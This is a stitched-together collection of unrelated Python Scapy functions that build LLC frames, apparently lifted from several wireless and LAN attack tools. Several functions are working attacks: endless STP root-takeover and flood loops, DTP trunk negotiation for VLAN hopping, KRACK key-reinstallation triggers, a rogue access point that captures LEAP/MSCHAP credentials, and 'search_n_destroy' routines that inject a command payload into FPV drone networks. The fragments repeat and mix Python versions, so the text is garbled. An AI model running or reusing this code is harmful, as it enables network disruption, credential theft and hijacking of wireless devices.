def _sendrcv(self, packet, recv_count=1):
""" Sends COTP packet and receives up to recv_count COTP packets from the server
"""
if self._is_llc_:
# Init _stop_filter static vars
_stop_filter.count = recv_count
_stop_filter.counter = 0
_stop_filter.dst_ref = self._src_ref_
full_packet = LLC(dsap=0xfe, ssap=0xfe,
ctrl=3) / CLNP() / COTP() / packet
# For LLC connect requests we need to calculate checksum
if full_packet.haslayer(COTP_LLC_ConnectRequest):
full_packet[
COTP_LLC_ConnectRequest].checksum_value = self.checksum(
raw(full_packet[COTP])[:-2])
answers = self._ether_.sendrcv(self._dst_mac_, full_packet,
_stop_filter)
# Filter COTP answers only
return self._filter(answers)
else:
self._send(packet)
answer = self._socket_.recv(4096)
if answer == None:
return None
else:
return [TPKT(answer)]
def get_gtk_2(self, pkt):
# Avoid packet from other interfaces
if not RadioTap in pkt:
return
# Skip retries
if pkt[Dot11].FCfield.retry:
return
# Skip unencrypted frames (TKIP rely on WEP packet)
if not pkt[Dot11].FCfield.wep:
return
# Normal decoding
try:
data = parse_data_pkt(pkt, self.tk)
except ValueError:
return
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
return
pkt_clear = LLC(data_clear)
if EAPOL in pkt_clear and pkt.addr1 == pkt.addr3 == self.mac and \
pkt_clear[EAPOL].load[1:3] == "\x03\x01":
raise self.WAIT_ARP_REPLIES()
def handleLEAP(self, sockObj, identity):
self.networkDescriptor.addEapType(17)
tries = self.max_tries
while tries:
tries -= 1
sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
SNAP(code=0x888e) / EAPOL(version=2, type=0) /
EAP(code=1, type=17, id=2) /
LEAP(data=self.mschap_challenge),
FCfield=2,
raw=True)
data = sockObj.recv()
if data is None:
continue
if not data.haslayer(EAP):
continue
if not data.haslayer(LEAP):
eap = data.getlayer(EAP)
if eap.type == 3:
return 1, tuple(eap.eap_types)
continue
leap = data.getlayer(LEAP)
sockObj.clientDescriptor.addIdentity(17, identity)
sockObj.clientDescriptor.addEapType(17)
sockObj.clientDescriptor.addMSChapInfo(17, self.mschap_challenge,
leap.data, identity)
return 0, None
if tries != self.max_tries:
return 2, None
def check_arp_reply(self, pkt):
data = parse_data_pkt(pkt, self.tk)
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
return
decoded_pkt = LLC(data_clear)
log_runtime.debug(hexdump(decoded_pkt, dump=True))
log_runtime.debug(repr(decoded_pkt))
self.deal_common_pkt(decoded_pkt)
if ARP not in decoded_pkt:
return
# ARP.op 2: is-at
if decoded_pkt[ARP].op == 2 and \
decoded_pkt[ARP].psrc == self.arp_target_ip and \
decoded_pkt[ARP].pdst == self.arp_source_ip:
# Got the expected ARP
if self.krack_state & 4 == 0:
# First time, normal behavior
log_runtime.info("Got ARP reply, this is normal")
self.krack_state |= 4
log_runtime.info("Trying to trigger CVE-2017-13080")
raise self.RENEW_GTK()
else:
# Second time, the packet has been accepted twice!
log_runtime.warning("Broadcast packet accepted twice!! "
"(CVE-2017-13080)")
def deBuilder(self, packet, stream, genFCS):
"""Return the decrypted packet"""
## Remove the FCS from the old packet body
postPkt = RadioTap(self.pt.byteRip(packet.copy(),
chop = True,
order = 'last',
output = 'str',
qty = 4))
## Remove RadioTap() info if required
if genFCS is False:
postPkt = RadioTap()/postPkt[RadioTap].payload
## Rip off the Dot11WEP layer
del postPkt[Dot11WEP]
## Add the stream to LLC
decodedPkt = postPkt/LLC(str(stream))
## Flip FCField bits accordingly
if decodedPkt[Dot11].FCfield == 65:
decodedPkt[Dot11].FCfield = 1
elif decodedPkt[Dot11].FCfield == 66:
decodedPkt[Dot11].FCfield = 2
## Return the decoded packet with or without FCS
if genFCS is False:
return decodedPkt
else:
return decodedPkt/Padding(load = binascii.unhexlify(self.pt.endSwap(hex(crc32(str(decodedPkt[Dot11])) & 0xffffffff)).replace('0x', '')))
def dup_LLC(pkt):
l_pkt = pkt.getlayer(LLC)
dsap = l_pkt.dsap
ssap = l_pkt.ssap
ctrl = l_pkt.ctrl
n_pkt = LLC(dsap=dsap, ssap=ssap, ctrl=ctrl)
return n_pkt
def dupLLC(pkt):
lPkt = pkt.getlayer(LLC)
dsap = lPkt.dsap
ssap = lPkt.ssap
ctrl = lPkt.ctrl
nPkt = LLC(dsap=dsap, ssap=ssap, ctrl=ctrl)
return nPkt
def search_n_destroy(iface: str):
setup_monitor(iface)
pkts_stream = sniff_gen(iface=iface)
for pkt in pkts_stream:
if UDP in pkt:
dgram = pkt[UDP]
if dgram.dport == 5555:
frame = (
RadioTap() / Dot11FCS(
subtype=8,
type="Data",
proto=0,
FCfield="to-DS",
addr1=pkt[Dot11].addr1,
addr2=pkt[Dot11].addr2,
addr3=pkt[Dot11].addr3,
) /
Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) /
LLC(dsap=0xAA, ssap=0xAA, ctrl=3) /
SNAP(OUI=0x0, code="IPv4") / IP(version=4,
proto="udp",
src=pkt[IP].src,
dst=pkt[IP].dst) /
UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex(
"436d640001001200010404000a000000808080802020202010652f"
)))
sendp(frame, iface=iface)
break
def _send(self, packet):
if self._is_llc_:
self._ether_.send(
self._dst_mac_,
LLC(dsap=0xfe, ssap=0xfe, ctrl=3) / CLNP() / COTP() / packet)
else:
l = len(str(TPKT() / COTP() / packet))
self._socket_.send(str(TPKT(length=l) / COTP() / packet))
def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):
print("Trying to negotiate a trunk on interface %s" % iface)
p = Dot3(src=mymac,
dst="01:00:0c:cc:cc:cc") / LLC() / SNAP() / DTP(tlvlist=[
DTPDomain(),
DTPStatus(),
DTPType(),
DTPNeighbor(neighbor=mymac)
])
sendp(p)
def decrypt(self, key=None):
if key is None:
key = conf.wepkey
if key and conf.crypto_valid:
d = Cipher(
algorithms.ARC4(self.iv + key.encode("utf8")),
None,
default_backend(),
).decryptor()
self.add_payload(LLC(d.update(self.wepdata) + d.finalize()))
def llc_enumerate(self, timeout):
bcast = "ff:ff:ff:ff:ff:ff"
bcast_packet = LLC() / SNAP() / s01fd.S01FD(type=0x0500)
answers = self._ether_.sendrcv_timeout(bcast, bcast_packet, timeout)
macs = []
for x in answers:
if x.haslayer(s01fd.S01FD):
if x[s01fd.S01FD].type == 0x0501:
macs.append(x.src)
return macs
def send(iface, team_id, cmd, data, stream, dh_key=1):
encoded_data = int.from_bytes(data, byteorder='big') * dh_key
pkg = RadioTap() / Dot11(type=2) / LLC() / Env(
team_id=team_id,
stream=stream,
cmd=cmd,
decoded=31337,
data=str(encoded_data),
sign=str(sign(encoded_data, private_key)))
for i in range(10):
time.sleep(randint(10, 200) / 1000)
sendp(pkg, iface=iface, verbose=0)
def send_ether_over_wpa(self, pkt, **kwargs):
"""Send an Ethernet packet using the WPA channel
Extra arguments will be ignored, and are just left for compatibiliy
"""
payload = LLC() / SNAP() / pkt[Ether].payload
dest = pkt.dst
if dest == "ff:ff:ff:ff:ff:ff":
self.send_wpa_to_group(payload, dest)
else:
assert dest == self.client
self.send_wpa_to_client(payload)
def accept(self):
"""
This extends the WirelessStateMachineSoftAP accept() method but
adds in the exchange of EAP identities.
"""
while not self.__shutdown__:
(sockObj, clientMAC) = WirelessStateMachineSoftAP.accept(self)
tries = self.max_tries
while tries:
tries -= 1
data = sockObj.recv()
if not data:
continue
if data.haslayer(EAPOL):
tries = self.max_tries
break
elif data.haslayer('Dot11AssoReq'):
sockObj.send(self.asso_resp_data, 0, 1, 0x10, True)
if tries != self.max_tries:
continue # shit failed in that loop up there
sockObj.sequence = 1
while tries:
tries -= 1
sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
SNAP(code=0x888e) / EAPOL(version=2, type=0) /
EAP(code=1,
type=1,
id=0,
identity='\x00networkid=' + self.essid +
',nasid=AP,portid=0'),
FCfield=2,
raw=True)
data = sockObj.recv()
if data is None:
continue
if not data.haslayer(EAP):
continue
data = data.getlayer(EAP)
if not 'identity' in data.fields:
continue
tries = self.max_tries
break
if tries != self.max_tries:
continue
eaptype = self.eap_priorities[0]
self.eap_handlers[eaptype](sockObj, data.identity)
self.networkDescriptor.addClient(sockObj.clientDescriptor)
return sockObj, clientMAC
def deBuilder(self, tgtPkt, decrypted):
"""Return the decrypted packet"""
## This is our encrypted data we need to remove
eData = self.pt.byteRip(tgtPkt[Dot11WEP].wepdata, qty=4, chop=True)
## This is our decrypted everything, LLC included
dEverything = self.pt.byteRip(decrypted,
qty=16,
order='last',
chop=True)
## Prep the new pkt
newPkt = tgtPkt.copy()
del newPkt[Dot11WEP].wepdata
## Remove the last four bytes of new pkt and unhexlify
postPkt = RadioTap((self.pt.byteRip(newPkt.copy(),
chop=True,
order='last',
output='str',
qty=4)))
del postPkt[Dot11WEP]
## The data is proper in here
finalPkt = postPkt.copy() / LLC(
binascii.unhexlify(dEverything.replace(' ', '')))
## Flip FCField bits accordingly
if finalPkt[Dot11].FCfield == 65L:
finalPkt[Dot11].FCfield = 1L
elif finalPkt[Dot11].FCfield == 66L:
finalPkt[Dot11].FCfield = 2L
## Calculate and append the FCS
crcle = crc32(str(finalPkt[Dot11])) & 0xffffffff
if sys.byteorder == "little":
## Convert to big endian
crc = struct.pack('<L', crcle)
## Convert to long
(fcsstr, ) = struct.unpack('!L', crc)
### Need to research which NIC causes /Raw(fcs) to be needed
#fcs = bytearray.fromhex('{:32x}'.format(fcsstr))
#return finalPkt/Raw(fcs)
return finalPkt
def extract_iv(self, pkt):
# Get IV
TSC, _, _ = parse_TKIP_hdr(pkt)
iv = TSC[0] | (TSC[1] << 8) | (TSC[2] << 16) | (TSC[3] << 24) | \
(TSC[4] << 32) | (TSC[5] << 40)
log_runtime.info("Got a packet with IV: %s", hex(iv))
if self.last_iv is None:
self.last_iv = iv
else:
if iv <= self.last_iv:
log_runtime.warning("IV re-use!! Client seems to be "
"vulnerable to handshake 3/4 replay "
"(CVE-2017-13077)"
)
data_clear = None
# Normal decoding
data = parse_data_pkt(pkt, self.tk)
try:
data_clear = check_MIC_ICV(data, self.mic_sta_to_ap, pkt.addr2,
pkt.addr3)
except (ICVError, MICError):
pass
# Decoding with a 0's TK
if data_clear is None:
data = parse_data_pkt(pkt, "\x00" * len(self.tk))
try:
mic_key = "\x00" * len(self.mic_sta_to_ap)
data_clear = check_MIC_ICV(data, mic_key, pkt.addr2, pkt.addr3)
log_runtime.warning("Client has installed an all zero "
"encryption key (TK)!!")
except (ICVError, MICError):
pass
if data_clear is None:
log_runtime.warning("Unable to decode the packet, something went "
"wrong")
log_runtime.debug(hexdump(pkt, dump=True))
self.deal_common_pkt(pkt)
return
log_runtime.debug(hexdump(data_clear, dump=True))
pkt = LLC(data_clear)
log_runtime.debug(repr(pkt))
self.deal_common_pkt(pkt)
def handlePEAP(self, sockObj, identity):
"""
This is not yet supported. Don't even bother trying.
"""
self.networkDescriptor.addEapType(25)
tries = self.max_tries
while tries:
tries -= 1
sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
SNAP(code=0x888e) / EAPOL(version=2, type=0) /
EAP(code=1, type=25, id=2) /
PEAP(version=1, flags='start'),
FCfield=2,
raw=True)
return 0, None
if tries != self.max_tries:
return 2, None
def krack_proceed(self, send_3handshake=False, send_gtk=False):
if send_3handshake:
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.RSN
data += self.build_GTK_KDE()
eap_2 = self.build_EAPOL_Key_8021X2004(
# Key information 0x13c9:
# ARC4 HMAC-MD5, Pairwise Key, Install, KEY ACK, KEY MIC, Secure,
# Encrypted, SMK
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep /= eap_2
if self.encrypt_3handshake:
self.send_wpa_to_client(rep[LLC])
else:
self.send(rep)
self.krack_state |= 1
if send_gtk:
self.krack_state |= 2
# Renew the GTK
self.install_GTK()
raise self.RENEW_GTK()
def send_package(team_id, cmd, data, stream, secret=1):
encoded_data = int.from_bytes(data.encode("utf8"), byteorder='big')
if secret:
encoded_data *= secret
sign = pow(
encoded_data,
416630781277800814953814580513424110047377680960014751160419299104297608231045831268928067045544928314141858100670009192591240905724326104212998727066806749775991859512985467386335248727366212496311835445519206288314961971649794077627215397698248772695210744234116886975514935938154766139111402330969569637045781583906208354776080495577200020108407556136499586164796389907166922237671055715487887786799244986759178031755557941345975177131220887691189096137799980824487098948957705003486690593888372619125282018749562562425210093659325238513650871460900036152105522975867533767774813200290043263911168611238356626767175435037031592618362267430363591558037274501963991875264047536819786553572102321569423719412238250605238240363922701792636849938648331077868628126881709247599501399540465597820044852593299499505038180936557649245135529256877460871112784752981624686300459846296292486993748346207809123629291846064014335221587323672733973420287032968282124022323956687252471100340715794873395808679397290092512810609160427004215773972691065223939827557113966792915102828090948248858696881189121556761133072592276642984898368959004066150858410041541634754689994600656660584789661194932334670195455527607156767471664815501851249574634337,
633197242999008209490008491329443808268980823641679113835174611692369378754186972864703370204625897846201821676722099913149950262938990767863440878803796529847158724013323328604847947586971834988423281842052600123308233911599938650003590174828396869721395727120062112650487508848820762220187931324260300665624724912213282708291822907996914746946911228758354746497895760988497717700715365206296778950036225562293869733944715013264486229387524310482293488093849945347952576499648465117886629596300317154575706313779279292557418345813069851965797902762696666882346358222471837125797920613779707930683786866906177316646782647986953441178855477265342189114729084143383638336395788758259144688880816050705492938159037002541783161514057631214694490908412807683995312027990284140738176749012934701869996265112608260038780126226929192377735384133445395542707023436972889327345248198228419660999295134942171314568620598538982965136918129729023445690600317510534012765959575319828414752062364938190741470089153869764020001003884655373108679135037208418386218769818496545353654180897982636677420461266856754158090013843249798877172013202806744077584057010684329393919654887407525000881165092445645529418937003293463949187616174793040905914082671
)
pkg = RadioTap() / Dot11(type=2) / LLC() / Env(team_id=team_id,
cmd=cmd,
stream=stream,
data=str(encoded_data),
sign=str(sign))
for i in range(10):
time.sleep(randint(10, 100) / 1000)
sendp(pkg, iface=IFACE, verbose=0)
def run(interface):
"""
This function launch STP TCN ATTACK
:param interface: interface to be launched the attack
:type interface: str
"""
# sniff to found a stp packet
pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)
# Look for a STP packet to use a lower priority
pk_list = {x: y for x, y in pkt.sessions().iteritems() if "Other" in x}
item = pk_list.popitem()
pkts = item[1]
for x in pkts:
if STP in x:
STP_packet = x
break
myMAC = get_if_hwaddr(interface)
root_id = STP_packet.rootid - 1
bridge_id = STP_packet.bridgeid - 1
p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00,
bpduflags=0x01,
portid=0x8002,
rootmac=myMAC,
bridgemac=myMAC,
rootid=root_id,
bridgeid=bridge_id)
pkt = p_ether / p_llc / p_stp # STP packet structure
try:
while 1:
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def send_wpa_handshake_3(self, pkt):
# Both nonce have been exchanged, install keys
client_nonce = pkt[EAPOL].load[13:13 + 0x20]
self.install_unicast_keys(client_nonce)
# Check client MIC
# Data: full message with MIC place replaced by 0s
# https://stackoverflow.com/questions/15133797/creating-wpa-message-integrity-code-mic-with-python
client_mic = pkt[EAPOL].load[77:77 + 16]
client_data = raw(pkt[EAPOL]).replace(client_mic,
"\x00" * len(client_mic))
assert hmac.new(self.kck, client_data,
hashlib.md5).digest() == client_mic
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
self.install_GTK()
data = self.RSN
data += self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
self.send(rep / eap)
def send_renew_gtk(self):
rep_to_enc = LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep_to_enc /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
# Key information 0x1381:
# ARC4 HMAC-MD5, Group Key, KEY ACK, KEY MIC, Secure, Encrypted,
# SMK
key_information=0x1381,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep_to_enc /= eap
self.send_wpa_to_client(rep_to_enc)
def send_wpa_handshake_1(self):
self.anonce = self.gen_nonce(32)
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
rep /= self.build_EAPOL_Key_8021X2004(
key_information=0x89,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
)
self.send(rep)
def search_n_destroy(iface: str):
setup_monitor(iface)
pkts_stream = sniff_gen(iface=iface)
for pkt in pkts_stream:
if Dot11Beacon in pkt:
beacon = pkt[Dot11Beacon]
network = beacon.network_stats()
ssid = network.get("ssid")
if ssid and ssid.startswith("FPV_"):
print(network)
sender = "b2:43:f6:64:a2:bb"
bssid = "14:6b:9c:58:75:07"
frame = send_asso_req(sender, bssid, ssid)
sendp(frame, iface=iface)
frame = (
RadioTap() / Dot11FCS(
subtype=8,
type="Data",
proto=0,
FCfield="to-DS",
addr1=bssid,
addr2=sender,
addr3=bssid,
) /
Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) /
LLC(dsap=0xAA, ssap=0xAA, ctrl=3) /
SNAP(OUI=0x0, code="IPv4") / IP(version=4,
proto="udp",
src="172.16.10.187",
dst="172.16.10.1") /
UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex(
"436d640001001200010404000a000000808080802020202010652f"
)))
print(frame)
sendp(frame, iface=iface)
def run(inter):
"""
This function launch STP TCN ATTACK
:param inter: interface to be launched the attack
:type inter: str
"""
interface = str(inter[0])
if len(interface) > 0:
try:
while 1:
# dst=Ethernet Multicast address used for spanning tree protocol
srcMAC = str(RandMAC()) # Random MAC in each iteration
p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x80) # TCN packet
pkt = p_ether/p_llc/p_stp # STP packet structure
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def send_arp_req(self):
if self.krack_state & 4 == 0:
# Set the address for future uses
self.arp_target_ip = self.dhcp_server.leases.get(self.client,
self.arp_target_ip)
assert self.arp_target_ip is not None
# Send the first ARP requests, for control test
log_runtime.info("Send ARP who-was from '%s' to '%s'",
self.arp_source_ip,
self.arp_target_ip)
arp_pkt = self.send_wpa_to_group(
LLC()/SNAP()/ARP(op="who-has",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac),
dest='ff:ff:ff:ff:ff:ff',
)
self.arp_sent.append(arp_pkt)
else:
if self.arp_to_send < len(self.arp_sent):
# Re-send the ARP requests already sent
self.send(self.arp_sent[self.arp_to_send])
self.arp_to_send += 1
else:
# Re-send GTK
self.arp_to_send = 0
self.arp_retry += 1
log_runtime.info("Trying to trigger CVE-2017-13080 %d/%d",
self.arp_retry, self.ARP_MAX_RETRY)
if self.arp_retry > self.ARP_MAX_RETRY:
# We retries 100 times to send GTK, then already sent ARPs
log_runtime.warning("Client is likely not vulnerable to "
"CVE-2017-13080")
raise self.EXIT()
raise self.RENEW_GTK()
def run(inter):
"""
This function launch STP CONF ATTACK
:param inter: interface to be launched the attack
:type inter: str
"""
interface = str(inter[0])
if len(interface) > 0:
try:
while 1:
# Root Identifier 8 bytes (MAC and root priority)
srcMAC = str(RandMAC()) # Random MAC in each iteration
root_prior = int(RandInt()) % 65536 # 2 bytes
# Brigde Identifier (mac and brigde priority)
brigde_prior = int(RandInt()) % 65536 # 2 bytes
# dst=Ethernet Multicast address used for spanning tree protocol
p_ether = Dot3(dst="01:80:c2:00:00:00", src=srcMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00,
bpduflags=0x01,
portid=0x8002,
rootmac=srcMAC,
bridgemac=srcMAC,
rootid=root_prior,
bridgeid=brigde_prior) # Conf packet
pkt = p_ether / p_llc / p_stp # STP packet structure
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def deal_common_pkt(self, pkt):
# Send to DHCP server
# LLC / SNAP to Ether
if SNAP in pkt:
ether_pkt = Ether(src=self.client,dst=self.mac) / pkt[SNAP].payload
self.dhcp_server.reply(ether_pkt)
# If an ARP request is made, extract client IP and answer
if ARP in pkt and \
pkt[ARP].op == 1 and pkt[ARP].pdst == self.dhcp_server.gw:
if self.arp_target_ip is None:
self.arp_target_ip = pkt[ARP].psrc
log_runtime.info("Detected IP: %s", self.arp_target_ip)
# Reply
ARP_ans = LLC()/SNAP()/ARP(
op="is-at",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac,
hwdst=self.client,
)
self.send_wpa_to_client(ARP_ans)
def check_eap_type(self,
essid,
eaptype,
outer_identity='user',
eapol_start=False,
rsnInfo=''):
"""
Check that an eaptype is supported.
errDict = {
0:"supported",
1:"not supported",
2:"could not determine",
3:"identity rejected"
}
"""
eapid = randint(1, 254)
if eapol_start:
eapol_start_request = (RadioTap() / Dot11(FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=2,
subtype=8) / Dot11QoS() /
LLC(dsap=170, ssap=170, ctrl=3) /
SNAP(code=0x888e) /
EAPOL(version=1, type=1))
self.sequence += 1
i = 0
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eapol_start_request)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if 'type' in fields and fields['type'] == 1 and fields[
'code'] == 1:
i = 0
eapid = fields['id']
break
if i == 2:
return 2
eap_identity_response = (
RadioTap() / Dot11(FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=2,
subtype=8) / Dot11QoS() /
LLC(dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) /
EAPOL(version=1, type=0) /
EAP(code=2, type=1, id=eapid, identity=outer_identity))
eap_legacy_nak = (
RadioTap() / Dot11(FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=2,
subtype=8) / Dot11QoS() /
LLC(dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) /
EAPOL(version=1, type=0, len=6) /
EAP(code=2, type=3, id=eapid + 1, eap_types=[eaptype]))
self.sequence += 1
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eap_identity_response)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if fields['code'] == 4: # 4 is a failure
return 3
if 'type' in fields and fields['type'] == eaptype:
return 0
i = 0
break
if i == 2:
return 2
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eap_legacy_nak)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if 'type' in fields and fields['type'] == eaptype:
return 0
else:
return 1
return 2